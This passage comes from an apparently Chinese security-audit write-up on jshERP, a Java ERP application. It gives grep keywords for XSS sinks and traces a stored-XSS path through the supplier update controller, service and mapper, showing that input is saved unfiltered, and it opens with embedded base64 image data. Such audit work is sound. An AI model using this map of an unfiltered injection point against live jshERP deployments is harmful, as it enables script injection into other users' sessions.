S0Nk2l6ZhQnk0l6enpob29/z0AWr9dLcXExrmmuQpBMJgkEAvT29hKLxfB4PAwPD3P48GEaGxspLCzEaDTS09NDfX09Ho+HnJwcRkdHSSQS2O120tPT0Wq10xrndJMErxBCCCGEEEIIIYQQQohLhkajQavVotOdefe2Vqv7wM3iEkJc2gKBAF1dXbS0nNtawiaTiezsbDwez7QkeBVFQaPRYDAY6O/vp7W1lXA4jEajwWaz4XA40Gq10zp7V1VVhoeHaWpqYt++fUQiEXJzc4lEInR2duJwOFi+fDl2u53t27ezb98+amtr8fv9dHZ2Eo1GycrKYvbs2aSlpZ3V35GTSSQS9Pf3k0wmsVqtWK3WSf2tGZ8VPTAwQDKZxGazYbPZJnVNSfAKIYQQQgghhBBCCCGEuGTo9XpsNhvx+JmXM7ZarRinaWbbB5+KmkySSCRIqgpotOi0ypSX4L74qajJBPG4ClodOo3Ch+4tOAPHzkgdT/xNdpbqVCYKFUVB8z6nU1VQUSf2V4CkqjLdFagzMzPR6XTk5+efdZl2RVEwGo3k5+dP2+xdGPv+ra6unkjkHj58GIPBwKxZs5g3bx4pKSnTdm0YKw1eW1vL5s2b8fv96HQ6mpubJ5KjRUVFpKWlYbFYyMjIoLGxkcOHD1NfXz8Rs9/vx+/3c/311+N0OqdkJm8oFOLFF18kEAgwY8YM5syZg8Vied/j4vE4/f39vPjii4RCIebPn8+8efMm9bMvCV4hhBBCCCGEEEIIIYQQlwyf14vT4TirRIhGo0Gv109DVB98qtrH3qfv56k/PMSTXU5Y/Q/86BOLWFFydmVpL1lDe9n16lP88H/fhL/4AV+5roxZ2eYLHdVFKR6PMzg4RFtbGxqNhvz8fFRVpa+vj5GRkdMe6/V6SU1NxWA4999Xi1FPZa6Hkkz3affrGgxQ3z5AMgnLqrLQahS2He6mpWeYSGz61sfWaDT4fD7cbvc5lWge/347H+vfFhYWoigKaWlpaDQa5s2bh9PpnPbr7t+/nwMHDqDValm1ahXZ2dm0tLQwNDSE2+2murp6IsFdVFSE2Wymvr6eSCRCXl4eGo2GxsZG6urq2LVrF7NmzcLjOffvsPH3fHBwkO3btxMOh1m6dCkmk+mUn0csFqOlpYV169bR1tY2MXN3sp+fJHiFEEIIIYQQQgghhBBCXDJGAwH6+voIBIJnfKzJZMTtdpPq801DZB90cYIDHbTX72NfqwdKhxgOT1/S6+LUzK6XnufRnzzM67WDZPcECcSSFzqoi1Y8Hqevr589e/ai1WlJSfGQSCY50tBAZ2fXaY8tKyvF7XZNSYLXatIztzida+YXnHa/PY09BMNx4okkty4rRa/TMBSM0DMYnNYEr6Io6HS6U5YLjsfjNDY2oigKKSkpuN2nT1SfD0ajkZycnInkqMvlOi/l7wOBAMFgEIvFQllZ2cT7EYlEMBrHvt/H47BYLOTk5OA4OiDI4XAQi8UIBoPs27ePoaEhYrHYlMRlMBiYP38+iUSCrq4uamtrURSF+fPnY7PZ3vPexGIxDh8+zK5du2hvb5+YGZ2TkzPpa0qCVwghhBBCCCGEEEIIIcQlY3R0lLb2dvr7/Wd8rMNhB5AErzgrqtpP28GD7NlUT7/DR+aFDugil0wmCYVCdPf0otPpiESjJBIJBgcH6enpPe2xmZmZJBJTkzzXazWkuy1U5Jx+pubgaBibWU88kaQs241Rr8NtM6F9v9rO0ygcDtPR0cGOHTtIJpMUFhZSVlaGy+W6YDGNG19r9nxyOp1YrVbi8TjRaBStVovX6yWZTBIMBmlpaSEQCJBMJjGZTDidTrxe70QZ5v7+fsLh8MRxRqNxSuLS6XQUFxcTDofZs2cP7e3t7N69G4PBQEVFBW63G61WO7HmbkNDA3v27KGpqQmDwUBVVRVVVVX4zuBvkyR4hRB
<p><a id=img17 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233321-3b460e7a-c117-1.png><img src=data:image/png;base64,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
<p>还有很多不一一列举可以使用Yakit进行扫描</p>
<h2 id=toc-11>XSS漏洞</h2>
<h3 id=toc-12>审计关键点</h3>
<p>关键字:</p>
<div class=highlight><pre><span></span>&lt;%<span class=o>=</span>
<span class=si>${</span><span class=p></span>
<span class=p>&lt;c:</span><span class=nv>out</span><span class=p></span>
<span class=p>&lt;c:</span><span class=nv>if</span><span class=p></span>
<span class=p>&lt;c:</span><span class=nv>forEach</span><span class=p></span>
<span class=p>ModelAndView</span>
<span class=p>ModelMap</span>
<span class=p>Model</span>
<span class=p>request.getParameter</span>
<span class=p>request.setAttribute</span>
</pre></div>
<p>在jsp文件中使用<code>&lt;c:out&gt;</code>标签是直接对代码进行输出而不当成js代码执行</p>
<p>在使用thymeleaf 模板进行渲染时,模板自带有字符转义的功能</p>
<ul>
<li>th:text 进行文本替换 不会解析html</li>
<li>th:utext 进行文本替换 会解析html</li>
</ul>
<p>以下例子中没有使用渲染模板,最好从前端界面入手,寻找可能的插入点,然后对后端代码进行分析</p>
<h3 id=toc-13>漏洞点1</h3>
<h4>分析</h4>
<p>存储型XSS一般分为两个部分</p>
<ul>
<li>将攻击向量通过某个接口存入</li>
<li>将数据库中的攻击向量通过某个接口显示在页面中</li>
</ul>
<p><strong>存入点分析</strong></p>
<p>根据/supplier/update找到对应的Controller在ResourceController.java中</p>
<div class=highlight><pre><span></span><span class=nd>@PostMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/{apiName}/update"</span><span class=o>,</span> <span class=n>produces</span> <span class=o>=</span> <span class=o>{</span><span class=s>"application/javascript"</span><span class=o>,</span> <span class=s>"application/json"</span><span class=o>})</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>updateResource</span><span class=o>(</span><span class=nd>@PathVariable</span><span class=o>(</span><span class=s>"apiName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>apiName</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"info"</span><span class=o>)</span> <span class=n>String</span> <span class=n>beanJson</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"id"</span><span class=o>)</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span> <span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=c1>// 这里</span>
<span class=kt>int</span> <span class=n>update</span> <span class=o>=</span> <span class=n>configResourceManager</span><span class=o>.</span><span class=na>update</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>beanJson</span><span class=o>,</span> <span class=n>id</span><span class=o>,</span> <span class=n>request</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>update</span> <span class=o>&gt;</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=k>if</span><span class=o>(</span><span class=n>update</span> <span class=o>==</span> <span class=o>-</span><span class=mi>1</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>TEST_USER</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>TEST_USER</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>ERROR</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>ERROR</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>找到对应的处理方法</p>
<div class=highlight><pre><span></span><span class=nd>@Transactional</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"transactionManager"</span><span class=o>,</span> <span class=n>rollbackFor</span> <span class=o>=</span> <span class=n>Exception</span><span class=o>.</span><span class=na>class</span><span class=o>)</span>
<span class=kd>public</span> <span class=kt>int</span> <span class=nf>update</span><span class=o>(</span><span class=n>String</span> <span class=n>apiName</span><span class=o>,</span> <span class=n>String</span> <span class=n>beanJson</span><span class=o>,</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span> <span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>apiName</span><span class=o>))</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>container</span><span class=o>.</span><span class=na>getCommonQuery</span><span class=o>(</span><span class=n>apiName</span><span class=o>).</span><span class=na>update</span><span class=o>(</span><span class=n>beanJson</span><span class=o>,</span> <span class=n>id</span><span class=o>,</span> <span class=n>request</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=mi>0</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>还是一样找到SupplierComponent.java类中的update方法</p>
<div class=highlight><pre><span></span><span class=nd>@Override</span>
<span class=kd>public</span> <span class=kt>int</span> <span class=nf>update</span><span class=o>(</span><span class=n>String</span> <span class=n>beanJson</span><span class=o>,</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span> <span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>supplierService</span><span class=o>.</span><span class=na>updateSupplier</span><span class=o>(</span><span class=n>beanJson</span><span class=o>,</span> <span class=n>id</span><span class=o>,</span> <span class=n>request</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>来到SupplierService.java层</p>
<div class=highlight><pre><span></span><span class=nd>@Transactional</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"transactionManager"</span><span class=o>,</span> <span class=n>rollbackFor</span> <span class=o>=</span> <span class=n>Exception</span><span class=o>.</span><span class=na>class</span><span class=o>)</span>
<span class=kd>public</span> <span class=kt>int</span> <span class=nf>updateSupplier</span><span class=o>(</span><span class=n>String</span> <span class=n>beanJson</span><span class=o>,</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span> <span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Supplier</span> <span class=n>supplier</span> <span class=o>=</span> <span class=n>JSONObject</span><span class=o>.</span><span class=na>parseObject</span><span class=o>(</span><span class=n>beanJson</span><span class=o>,</span> <span class=n>Supplier</span><span class=o>.</span><span class=na>class</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>supplier</span><span class=o>.</span><span class=na>getBeginNeedPay</span><span class=o>()</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>supplier</span><span class=o>.</span><span class=na>setBeginNeedPay</span><span class=o>(</span><span class=n>BigDecimal</span><span class=o>.</span><span class=na>ZERO</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>if</span><span class=o>(</span><span class=n>supplier</span><span class=o>.</span><span class=na>getBeginNeedGet</span><span class=o>()</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>supplier</span><span class=o>.</span><span class=na>setBeginNeedGet</span><span class=o>(</span><span class=n>BigDecimal</span><span class=o>.</span><span class=na>ZERO</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>supplier</span><span class=o>.</span><span class=na>setId</span><span class=o>(</span><span class=n>id</span><span class=o>);</span>
<span class=kt>int</span> <span class=n>result</span><span class=o>=</span><span class=mi>0</span><span class=o>;</span>
<span class=k>try</span><span class=o>{</span>
<span class=c1>// 这里</span>
<span class=n>result</span><span class=o>=</span><span class=n>supplierMapper</span><span class=o>.</span><span class=na>updateByPrimaryKeySelective</span><span class=o>(</span><span class=n>supplier</span><span class=o>);</span>
<span class=n>logService</span><span class=o>.</span><span class=na>insertLog</span><span class=o>(</span><span class=s>"商家"</span><span class=o>,</span>
<span class=k>new</span> <span class=n>StringBuffer</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>LOG_OPERATION_TYPE_EDIT</span><span class=o>).</span><span class=na>append</span><span class=o>(</span><span class=n>supplier</span><span class=o>.</span><span class=na>getSupplier</span><span class=o>()).</span><span class=na>toString</span><span class=o>(),</span> <span class=n>request</span><span class=o>);</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>JshException</span><span class=o>.</span><span class=na>writeFail</span><span class=o>(</span><span class=n>logger</span><span class=o>,</span> <span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>成功找到对应的Mapper即SupplierMapper并且操作id为updateByPrimaryKeySelective在相应的xml文件中找到更新的sql语句</p>
<div class=highlight><pre><span></span><span class=nt>&lt;update</span> <span class=na>id=</span><span class=s>"updateByPrimaryKeySelective"</span> <span class=na>parameterType=</span><span class=s>"com.jsh.erp.datasource.entities.Supplier"</span><span class=nt>&gt;</span>
update jsh_supplier
<span class=nt>&lt;set&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"supplier != null"</span><span class=nt>&gt;</span>
supplier = #{supplier,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"contacts != null"</span><span class=nt>&gt;</span>
contacts = #{contacts,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"phoneNum != null"</span><span class=nt>&gt;</span>
phone_num = #{phoneNum,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"email != null"</span><span class=nt>&gt;</span>
email = #{email,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"description != null"</span><span class=nt>&gt;</span>
description = #{description,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"isystem != null"</span><span class=nt>&gt;</span>
isystem = #{isystem,jdbcType=TINYINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"type != null"</span><span class=nt>&gt;</span>
type = #{type,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"enabled != null"</span><span class=nt>&gt;</span>
enabled = #{enabled,jdbcType=BIT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"advanceIn != null"</span><span class=nt>&gt;</span>
advance_in = #{advanceIn,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"beginNeedGet != null"</span><span class=nt>&gt;</span>
begin_need_get = #{beginNeedGet,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"beginNeedPay != null"</span><span class=nt>&gt;</span>
begin_need_pay = #{beginNeedPay,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"allNeedGet != null"</span><span class=nt>&gt;</span>
all_need_get = #{allNeedGet,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"allNeedPay != null"</span><span class=nt>&gt;</span>
all_need_pay = #{allNeedPay,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"fax != null"</span><span class=nt>&gt;</span>
fax = #{fax,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"telephone != null"</span><span class=nt>&gt;</span>
telephone = #{telephone,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"address != null"</span><span class=nt>&gt;</span>
address = #{address,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"taxNum != null"</span><span class=nt>&gt;</span>
tax_num = #{taxNum,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"bankName != null"</span><span class=nt>&gt;</span>
bank_name = #{bankName,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"accountNumber != null"</span><span class=nt>&gt;</span>
account_number = #{accountNumber,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"taxRate != null"</span><span class=nt>&gt;</span>
tax_rate = #{taxRate,jdbcType=DECIMAL},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"tenantId != null"</span><span class=nt>&gt;</span>
tenant_id = #{tenantId,jdbcType=BIGINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"deleteFlag != null"</span><span class=nt>&gt;</span>
delete_flag = #{deleteFlag,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/set&gt;</span>
where id = #{id,jdbcType=BIGINT}
<span class=nt>&lt;/update&gt;</span>
</pre></div>
<p>这整条数据流就是将攻击向量存入数据库的过程中间的方法为进行任何的过滤filter层也没有对输入进行过滤。</p>
<p>现在需要触发xss只需要将相关参数显示在界面中即可。</p>
<p><strong>读取点分析</strong></p>
<p>读取supplier还有另一个api根据前端观察可以知道为/supplier/list</p>
<p>同样在</p>
<div class=highlight><pre><span></span><span class=nd>@GetMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/{apiName}/list"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>getList</span><span class=o>(</span><span class=nd>@PathVariable</span><span class=o>(</span><span class=s>"apiName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>apiName</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>PAGE_SIZE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>pageSize</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>CURRENT_PAGE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>currentPage</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>String</span> <span class=n>search</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>requestToMap</span><span class=o>(</span><span class=n>request</span><span class=o>);</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>search</span><span class=o>);</span>
<span class=n>PageQueryInfo</span> <span class=n>queryInfo</span> <span class=o>=</span> <span class=k>new</span> <span class=n>PageQueryInfo</span><span class=o>();</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>pageSize</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>pageSize</span> <span class=o>&lt;=</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=n>pageSize</span> <span class=o>=</span> <span class=mi>10</span><span class=o>;</span>
<span class=o>}</span>
<span class=n>String</span> <span class=n>offset</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>getPageOffset</span><span class=o>(</span><span class=n>currentPage</span><span class=o>,</span> <span class=n>pageSize</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>offset</span><span class=o>))</span> <span class=o>{</span>
